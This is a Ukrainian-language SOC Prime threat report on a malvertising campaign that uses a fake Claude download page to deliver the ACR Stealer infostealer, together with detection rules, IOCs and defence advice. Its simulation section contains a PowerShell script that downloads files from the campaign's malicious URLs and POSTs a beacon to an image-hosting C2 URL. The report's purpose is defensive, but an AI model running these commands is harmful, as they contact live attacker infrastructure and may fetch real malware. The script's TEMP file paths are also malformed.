Сторінка видавання себе за Claude може доставити ACR Stealer

SOC Prime Team

Стежити

Сторінка видавання себе за Claude може доставити ACR Stealer

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Дослідники загроз виявили шкідливу рекламну кампанію, яка перенаправляє користувачів на підробну сторінку завантаження Claude. Сайт доставляє різні навантаження залежно від операційної системи жертви, з Windows-ланцюгом зараження, що призводить до розгортання ACRStealer. Слідчі пов’язали цю активність з багатьма скомпрометованими доменами та сервером керування та контролю, який використовується після зараження. Кампанія покладається на зашифровані URL-адреси та PowerShell-скрипт для завершення доставки навантаження.

Розслідування

Аналітик прослідкував активність від початкової підробної сторінки Claude через декілька перенаправлених URL-адрес, розміщених на різних доменах. Під час ланцюга зараження було завантажено ZIP-архів, PowerShell-скрипт і зображення JPEG, після чого здійснювалося HTTPS-з’єднання з доменом керування та контролю. Аналіз трафіку підтвердив, що післяінфекційна мережева поведінка відповідала інфраструктурі, пов’язаній з родиною ACRStealer.

Захист

Організації мають блокувати виявлені шкідливі домени та URL-адреси на мережевій межі. Рекламний трафік слід фільтрувати для виявлення шкідливих оголошень, які посилаються на підробну сторінку Claude або схожі виверти імітації. Захист кінцевих пристроїв також слід налаштувати на виявлення поведінки, що пов’язана з ACRStealer, та підозріле виконання PowerShell.

Реагування

Захисники повинні контролювати вихідні з’єднання з доменом керування та контролю yw.enhanceblabber.cc та повідомляти про завантаження виявленого ZIP-архіву та PowerShell-скрипту. Будь-який хост, що демонструє відповідну активність, повинен підлягати судово-цифровій експертизі на можливі артефакти ACRStealer і бути ізольованим, якщо компрометація підтвердиться.

Потік атаки

Ми ще оновлюємо цю частину. Підпишіться, щоб отримати сповіщення

Повідомити мене

Детекції

Підозріла поведінка ухилення LOLBAS MSHTA шляхом виявлення пов’язаних команд (через process_creation)

Команда SOC Prime

26 травня 2026

Переглянути

Підозрілі дії керування та контролю через незвичний запит домену верхнього рівня (TLD) DNS (через dns)

Команда SOC Prime

26 травня 2026

Переглянути

Індикатори компрометації (HashSha256) для виявлення: Можливий ACR Stealer зі сторінки, що імітує Claude

SOC Prime AI правила

26 травня 2026

Переглянути

Виявлення розповсюдження ACR Stealer через підробні сторінки завантаження Claude [Мережеве з’єднання Windows]

SOC Prime AI правила

26 травня 2026

Переглянути

Запуск симуляції

Передумова: Телеметрія та перевірка базових показників мають бути успішно пройдені.

Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), призначеної для спрацювання правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та прагнути генерації точних даних телеметрії, якого очікує логіка виявлення.

Нарис атаки та команди:
1. Початкова приманка: Зловмисник відправляє фішинговий електронний лист із посиланням на https://fairpoint29.com/. Жертва клацає на посилання, що завантажує підробну сторінку завантаження Claude.
2. Виконання зловмисного завантажувача: Сторінка автоматично запускає завантаження з https://primemetricsa.com/1518925, доставляючи масковане навантаження.
3. Отримання вторинного навантаження: Завантажений заглушка контактує з https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d щоб отримати повну бінарну версію ACR Stealer.
4. C2 сигнал: Після виконання шкідливе ПЗ відправляє сигнал на https://i.ibb.co/Xx16sbMz/init-block.jpg (техніка, що використовує хостинг зображень для прихованого C2).
Кожен крок генерує відповідний запис проксі-логу, що відповідає точним доменним and url значенням, визначеним у правилі Sigma, таким чином задовольняючи умову виявлення.

Скрипт регресійного тесту:

# -------------------------------------------------
# Симуляція розповсюдження ACR Stealer – Спрацювання правила
# -------------------------------------------------
# Крок 1: Підробна сторінка завантаження Claude (безпечний GET)
Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null

# Крок 2: Бінарний завантажувач (симульоване завантаження маленького файлу)
Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing

# Крок 3: Отримання повного навантаження
Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" `
  -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing

# Крок 4: C2 сигнал (POST невеликого зображення, щоб замаскувати трафік)
$body = [System.Text.Encoding]::UTF8.GetBytes("beacon")
Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" `
  -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null
# -------------------------------------------------
# Кінець симуляції
# -------------------------------------------------

Команди очищення:

# Видалити завантажені артефакти
Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue

# Очистити кеш DNS, щоб уникнути залишкових записів
ipconfig /flushdns

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно